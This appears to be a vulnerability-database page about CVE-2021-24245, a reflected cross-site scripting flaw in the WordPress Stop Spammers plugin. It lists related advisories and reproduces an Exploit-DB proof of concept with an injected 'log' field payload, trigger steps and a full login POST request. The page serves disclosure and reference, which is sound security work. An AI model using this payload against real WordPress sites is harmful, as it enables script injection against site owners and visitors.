| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| WordPress Stop Spammers 2021.8 Plugin - (log) Reflected Cross-site Scripting Vulnerability | 19 May 202100:00 | – | zdt | |
| CVE-2021-24245 | 19 May 202110:05 | – | circl | |
| WordPress 跨站脚本漏洞 | 6 May 202100:00 | – | cnnvd | |
| WordPress Stop Spammers Plugin Cross Site Scripting (CVE-2021-24245) | 1 Jun 202100:00 | – | checkpoint_advisories | |
| CVE-2021-24245 | 5 May 202118:39 | – | cve | |
| CVE-2021-24245 Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS) | 5 May 202118:39 | – | cvelist | |
| WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS) | 19 May 202100:00 | – | exploitdb | |
| WordPress Stop Spammers <2021.9 - Cross-Site Scripting | 7 Jun 202603:02 | – | nuclei | |
| CVE-2021-24245 | 6 May 202113:15 | – | nvd | |
| WordPress Stop Spammers plugin <= 2021.8 - Reflected Cross-Site Scripting (XSS) vulnerability | 8 Apr 202100:00 | – | patchstack |
`# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
# Date: 04/08/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/
# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip
# Version: <= 2021.8
# Tested on: Windows-Ubuntu
# CVE : CVE-2021-24245
Summary:
Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript
Proof of concepts:
1-Install "Stop Spammers <= 2021.8" in your wordpress website
2-For testing remove your IP address from the allowed list
3-Go to http://<YOUR-WEBSITE>/wp-admin
4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) "
#Notice the `ad` keyword must be in your payload!
5-Press Alt + Shift + X to trigger Xss
#Tested on Firefox
Request POC:
POST /wp-login.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 161
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check;
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation